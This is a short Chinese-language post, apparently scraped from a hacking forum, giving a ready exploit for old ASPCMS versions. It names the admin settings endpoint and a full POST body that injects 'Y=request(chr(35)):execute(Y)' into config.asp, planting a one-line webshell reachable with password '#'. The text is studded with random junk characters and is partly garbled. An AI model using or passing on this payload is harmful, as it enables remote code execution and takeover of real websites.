老的ASPCMS版本的秒杀拿SHELL漏洞' s! b4 @, F: [. `. M* ]7 \8 v
' c0 B7 s5 I2 m8 O. o' v
找到后台。。。然后
( r8 Z! S$ V% i; N- a* _! N/ @8 c
g5 `; g* t) Q, d0 a/admin/_system/AspCms_SiteSetting.asp?action=saves$ Z5 m2 l4 j+ \0 q! _# a. ~2 \, ?& m
% f r5 P# u6 ~
直接POST' Q/ j0 d3 W: _* @ W/ S
6 I8 d: B4 f7 @. Q$ r. c$ ZrunMode=1&siteMode=1&siteHelp=%B1%BE%CD%F8%D5%BE%D2%F2%B3%CC%D0%F2%C9%FD%BC%B6%B9%D8%B1%D5%D6%D0&SwitchComments=1&SwitchCommentsStatus=1&switchFaq=0:Y=request(chr(35)):execute(Y)&SwitchFaqStatus=0&dirtyStr=&waterMark=1&waterMarkFont=hahahaha&waterMarkLocation=1&smtp_usermail=aspcmstest%40163.com&smtp_user=aspcmstest&smtp_password=aspcms.cn&smtp_server=smtp.163.com&MessageAlertsEmail=13322712%40qq.com&messageReminded=1&orderReminded=1&applyReminded=1&commentReminded=1&LanguageID=1% l" {- V* ]. I9 J, j3 {, {- |
4 ]. l) g1 {# x+ S5 D$ [) Q/ ^再连接配置文件config.asp 密码为#* i$ \2 j) m6 `2 V: o6 o3 L
|